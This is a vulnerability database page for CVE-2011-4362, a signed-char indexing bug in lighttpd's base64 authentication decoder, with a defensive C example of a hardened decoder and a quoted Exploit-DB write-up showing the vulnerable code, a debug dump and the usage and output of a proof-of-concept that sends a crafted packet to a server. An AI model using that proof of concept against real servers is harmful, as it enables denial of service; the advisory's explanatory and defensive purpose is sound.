CVE-2011-4362 : Detail

CVE-2011-4362

EPSS score: 8.64% (EPSS v3)
Attack vector: Network
Published: 2011-12-24 18:00 +00:00
Last updated: 2021-02-19 03:06 +00:00

CVE description

Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.
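The following C program is an added example, not lighttpd's code and not the upstream 1.4.30 patch (which this page does not reproduce). It rebuilds a 256-entry reverse table of the kind named in the description, shows the index that the pre-fix pattern `int ch = in[i]` (with `in` a `const char *`) computes for a byte of 0x9a on a platform where `char` is signed, and implements a decoder that reads each byte through `unsigned char` so the index always stays in 0..255 and any byte outside the base64 alphabet is rejected instead of indexed. The runtime table construction, the function names and the sample inputs are assumptions of the example.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* 256-entry reverse table of the kind named in the CVE description (the real
 * lighttpd table is a static initializer; building it at runtime is an
 * assumption of this example). Entry = 6-bit value of a base64 digit, -1 otherwise. */
static short base64_reverse_table[256];
static int table_ready = 0;

static void init_table(void) {
    const char *alphabet =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    for (int i = 0; i < 256; i++)
        base64_reverse_table[i] = -1;
    for (int i = 0; i < 64; i++)
        base64_reverse_table[(unsigned char)alphabet[i]] = (short)i;
    table_ready = 1;
}

/* The index the pre-1.4.30 pattern computes: `int ch = in[i];` with `in` a
 * `const char *`. Where char is signed (x86/x86-64 with gcc or clang), any
 * byte >= 0x80 becomes negative, so base64_reverse_table[ch] would read
 * before the start of the table. This function only reports the index; it
 * never performs the out-of-bounds read. */
static int vulnerable_index(const char *in, size_t i) {
    int ch = in[i];
    return ch;
}

/* The hardened read: go through unsigned char, so the index is always 0..255. */
static int safe_index(const char *in, size_t i) {
    return (unsigned char)in[i];
}

/* Decoder built on the hardened indexing. Returns the decoded length, or -1
 * when the input contains a byte that is not a base64 digit (this includes
 * every byte >= 0x80, the class the crafted input relies on) or the output
 * buffer is too small. A padding '=' ends decoding. */
static int base64_decode_safe(unsigned char *out, size_t out_len, const char *in) {
    if (!table_ready)
        init_table();
    size_t o = 0;
    unsigned int acc = 0;   /* bit accumulator, 6 bits in per digit, 8 bits out per byte */
    int bits = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (in[i] == '=')
            break;
        short v = base64_reverse_table[safe_index(in, i)];
        if (v < 0)
            return -1;      /* reject rather than index with a bad value */
        acc = ((acc << 6) | (unsigned int)v) & 0xffffffu;
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (o >= out_len)
                return -1;
            out[o++] = (unsigned char)((acc >> bits) & 0xffu);
        }
    }
    return (int)o;
}

/* Helpers that return checkable results. */
static int decoded_len(const char *in) {
    unsigned char buf[256];
    return base64_decode_safe(buf, sizeof buf, in);
}

static int decodes_to(const char *in, const char *expected) {
    unsigned char buf[256];
    int n = base64_decode_safe(buf, sizeof buf, in);
    return n >= 0 && (size_t)n == strlen(expected) && memcmp(buf, expected, (size_t)n) == 0;
}

int main(void) {
    /* Constructed inputs: an ordinary Basic-auth credential and a string whose
     * first byte is 0x9a, the kind of byte the crafted input relies on. */
    const char *good = "QWxhZGRpbjpvcGVuIHNlc2FtZQ==";
    const char crafted[] = "\x9a" "Yg";

    printf("decoded length of %s: %d\n", good, decoded_len(good));
    printf("index for byte 0x9a, old pattern: %d\n", vulnerable_index(crafted, 0));
    printf("index for byte 0x9a, hardened:    %d\n", safe_index(crafted, 0));
    printf("decode of crafted input: %d (rejected)\n", decoded_len(crafted));
    return 0;
}
```

On a signed-char platform the old pattern yields -102 for 0x9a, which matches the shape of the negative offsets in the debug dump further down this page; the hardened read yields 154. Whether the negative read actually faults depends on what lies in .rodata before the table, which is why the decoder here rejects the byte outright rather than relying on the memory layout.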

CVE information

Metrics

Metric | Score | Severity | CVSS vector | Source
V2 | 5.0 | Medium | AV:N/AC:L/Au:N/C:N/I:N/A:P | [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood that a vulnerability will be exploited.

EPSS score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that the vulnerability will be exploited.

EPSS percentile

The percentile is used to rank CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95% of all other CVEs. The percentile thus compares one CVE's EPSS score with those of other CVEs.

Exploit information

Exploit Database EDB-ID: 18295

Publication date: 2011-12-30 23:00 +00:00
Author: pi3
EDB verified: Yes

29 November 2011 was the date of public disclosure of an interesting vulnerability in the lighttpd server. Xi Wang discovered that mod_auth for this server does not properly decode characters from the extended ASCII table. The vulnerable code is below: "src/http_auth.c:67"

--- CUT ---
static const short base64_reverse_table[256] = ...;

static unsigned char * base64_decode(buffer *out, const char *in) {
    ...
    int ch, ...;
    size_t i;
    ...
    ch = in[i];
    ...
    ch = base64_reverse_table[ch];
    ...
}
--- CUT ---

Because the variable 'in' is of type 'char', characters above 0x80 lead to negative indices. This vulnerability may lead to an out-of-bounds read and theoretically cause a Segmentation Fault (Denial of Service attack). Unfortunately I couldn't find any binaries where the .rodata section before the base64_reverse_table table causes this situation.

I have added some extra debug in the lighttpd source code to see if this vulnerability is executed correctly. Here is the output for one of the examples:

--- CUT ---
ptr[0x9a92c48] size[0xc0] used[0x0]
127(. | 0 | 0) -128(t | 1 | 0) -127(e | 2 | 1) -126(' | 3 | 2) -125(e | 4 | 3) -124(u | 5 | 3)
-123(r | 6 | 4) -122(' | 7 | 5) -121(s | 8 | 6) -120(c | 9 | 6) -119(i | 10 | 7) -118(n | 11 | 8)
-117(i | 12 | 9) -116( | 13 | 9) -115(a | 14 | 10) -114(t | 15 | 11) -113(. | 16 | 12) -112(e | 17 | 12)
-111(u | 18 | 13) -110(r | 19 | 14) -109(' | 20 | 15) -108(f | 21 | 15) -107(i | 22 | 16) -106(e | 23 | 17)
-105(: | 24 | 18) -104(= | 25 | 18) -103(o | 26 | 19) -102(t | 27 | 20) -101(o | 28 | 21) -100( | 29 | 21)
-99(a | 30 | 22) -98(g | 31 | 23) -97(. | 32 | 24) -96(d | 33 | 24) -95(g | 34 | 25) -94(s | 35 | 26)
-93(: | 36 | 27) -92(u | 37 | 27) -91(s | 38 | 28) -90(p | 39 | 29) -89(o | 40 | 30) -88(t | 41 | 30)
-87(d | 42 | 31) -86(b | 43 | 32) -85(c | 44 | 33) -84(e | 45 | 33) -83(d | 46 | 34) -82(( | 47 | 35)
-81(n | 48 | 36) -80(y | 49 | 36) -79(h | 50 | 37) -78(d | 51 | 38) -77(g | 52 | 39) -76(s | 53 | 39)
-75( | 54 | 40) -74(r | 55 | 41) -73(p | 56 | 42) -72(a | 57 | 42) -71(n | 58 | 43) -70(. | 59 | 44)
-69(. | 60 | 45) -68(d | 61 | 45) -67(g | 62 | 46) -66(s | 63 | 47) -65(: | 64 | 48) -64(( | 65 | 48)
-63(d | 66 | 49) -62(- | 67 | 50) -61(e | 68 | 51) -60(s | 69 | 51) -59( | 70 | 52) -58(i | 71 | 53)
-57(s | 72 | 54) -56(n | 73 | 54) -55( | 74 | 55) -54(i | 75 | 56) -53(l | 76 | 57) -52(. | 77 | 57)
-51(. | 78 | 58) -50(k | 79 | 59) -49(0 | 80 | 60) -48(% | 81 | 60) -47(] | 82 | 61) -46(p | 83 | 62)
-45(r | 84 | 63) -44(0 | 85 | 63) -43(% | 86 | 64) -42(] | 87 | 65) -41(s | 88 | 66) -40(z | 89 | 66)
-39([ | 90 | 67) -38(x | 91 | 68) -37(x | 92 | 69) -36( | 93 | 69) -35(s | 94 | 70) -34(d | 95 | 71)
-33(0 | 96 | 72) -32(% | 97 | 72) -31(] | 98 | 73) -30(. | 99 | 74) -29(. | 100 | 75) -28(d | 101 | 75)
-27(c | 102 | 76) -26(d | 103 | 77) -25(i | 104 | 78) -24(g | 105 | 78) -23(b | 106 | 79) -22(s | 107 | 80)
-21(6 | 108 | 81) -20(- | 109 | 81) -19(t | 110 | 82) -18(i | 111 | 83) -17(g | 112 | 84) -16(f | 113 | 84)
-15(i | 114 | 85) -14(e | 115 | 86) -13(. | 116 | 87) -12(. | 117 | 87) -11(. | 118 | 88) -10(. | 119 | 89)
-9(. | 120 | 90) -8(. | 121 | 90) -7(. | 122 | 91) -6(. | 123 | 92) -5(. | 124 | 93) -4(. | 125 | 93)
-3(. | 126 | 94) -2(. | 127 | 95) -1(. | 128 | 96)
k[0x60]
ptr[0x9a92c48] size[0xc0] used[0x0]
ptr[0x9a92c48] size[0xc0] used[0x60]
string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
--- CUT ---

The first column is the offset, so the vulnerability is executed like it should be (negative offsets). The second column is the byte which is read out-of-bounds.

How to run this very primitive Proof of Concept?

$ gcc p_cve-2011-4362.c -o p_cve-2011-4362
$ ./p_cve-2011-4362

...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...

Usage: ./p_cve-2011-4362 <options>

Options:
  -v <victim>
  -p <port>
  -d <remote_dir_for_auth>

$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa

...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...

[+] Preparing arguments... OK
[+] Creating socket... OK
[+] Connecting to [127.0.0.1]... OK
[+] Sending dirty packet... OK
[+] Check the website!
$

Lighttpd will probably log this situation in the error-log file like this:

--- CUT ---
..
..
2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in �Yg\���n�Xt�]rze���gY��\��Yb�Y(�d��r�[Y���-�xi��i�k�Wp� ]߶��\���@V��x���ize
--- CUT ---

Maybe you can find a vulnerable binary?

Best regards,
Adam 'pi3' Zabrocki

--
http://pi3.com.pl

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18295.c (p_cve-2011-4362.c)
http://blog.pi3.com.pl/?p=277

Products Mentioned

Configuration 0

Lighttpd>>Lighttpd >> Version From (including) 1.4.1 To (excluding) 1.4.30

Lighttpd>>Lighttpd >> Version 1.5.0

Configuration 0

Debian>>Debian_linux >> Version 5.0

Debian>>Debian_linux >> Version 6.0

Debian>>Debian_linux >> Version 7.0

References

http://secunia.com/advisories/47260
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.openwall.com/lists/oss-security/2011/11/29/8
Tags : mailing-list, x_refsource_MLIST
http://www.debian.org/security/2011/dsa-2368
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.exploit-db.com/exploits/18295
Tags : exploit, x_refsource_EXPLOIT-DB
http://blog.pi3.com.pl/?p=277
Tags : x_refsource_MISC
http://www.openwall.com/lists/oss-security/2011/11/29/13
Tags : mailing-list, x_refsource_MLIST
http://www.securitytracker.com/id?1026359
Tags : vdb-entry, x_refsource_SECTRACK
http://jvn.jp/en/jp/JVN37417423/index.html
Tags : third-party-advisory, x_refsource_JVN